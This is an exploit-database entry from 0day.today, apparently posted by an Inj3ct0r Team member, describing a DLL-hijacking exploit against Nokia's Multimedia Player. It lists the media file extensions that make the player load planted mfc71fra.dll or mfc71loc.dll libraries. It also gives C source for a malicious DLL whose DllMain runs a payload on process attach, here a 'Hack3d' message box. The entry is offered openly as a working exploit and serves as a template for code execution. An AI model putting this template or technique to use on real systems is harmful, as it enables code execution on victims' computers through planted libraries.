Multi Media Player Dll Hijacking Exploit

2010-10-02T00:00:00
ID 1337DAY-ID-14297
Type zdt
Reporter indoushka
Modified 2010-10-02T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ========================================
Multi Media Player Dll Hijacking Exploit
========================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://www.nokia.com

# Date: 2010-07-27 

# Author : indoushka 

# Thanks to : Dz-Ghost Team

# Contact : 00213771818860

# Tested on : windows SP2 Francais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
-------------
exploited multimediaplayer.exe with exploit.3g2 using mfc71fra.dll
exploited multimediaplayer.exe with exploit.3g2 using mfc71loc.dll
exploited multimediaplayer.exe with exploit.3gp using mfc71fra.dll
exploited multimediaplayer.exe with exploit.3gp using mfc71loc.dll
exploited multimediaplayer.exe with exploit.amr using mfc71fra.dll
exploited multimediaplayer.exe with exploit.amr using mfc71loc.dll
exploited multimediaplayer.exe with exploit.awb using mfc71fra.dll
exploited multimediaplayer.exe with exploit.awb using mfc71loc.dll
exploited multimediaplayer.exe with exploit.evc using mfc71fra.dll
exploited multimediaplayer.exe with exploit.nim using mfc71fra.dll
exploited multimediaplayer.exe with exploit.nim using mfc71loc.dll
exploited multimediaplayer.exe with exploit.npl using mfc71fra.dll
exploited multimediaplayer.exe with exploit.npl using mfc71loc.dll
exploited multimediaplayer.exe with exploit.obm using mfc71fra.dll
exploited multimediaplayer.exe with exploit.obm using mfc71loc.dll
exploited multimediaplayer.exe with exploit.otb using mfc71fra.dll
exploited multimediaplayer.exe with exploit.otb using mfc71loc.dll
exploited multimediaplayer.exe with exploit.wbm using mfc71fra.dll
exploited multimediaplayer.exe with exploit.wbm using mfc71loc.dll
exploited multimediaplayer.exe with exploit.wbmp using mfc71fra.dll
exploited multimediaplayer.exe with exploit.wbmp using mfc71loc.dll
-------------
#include "stdafx.h"
#include "stdlib.h"
void init() {
MessageBox(NULL,"indoushka", "Hack3d",0x00000003);
}
 
 
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2018-01-02]  #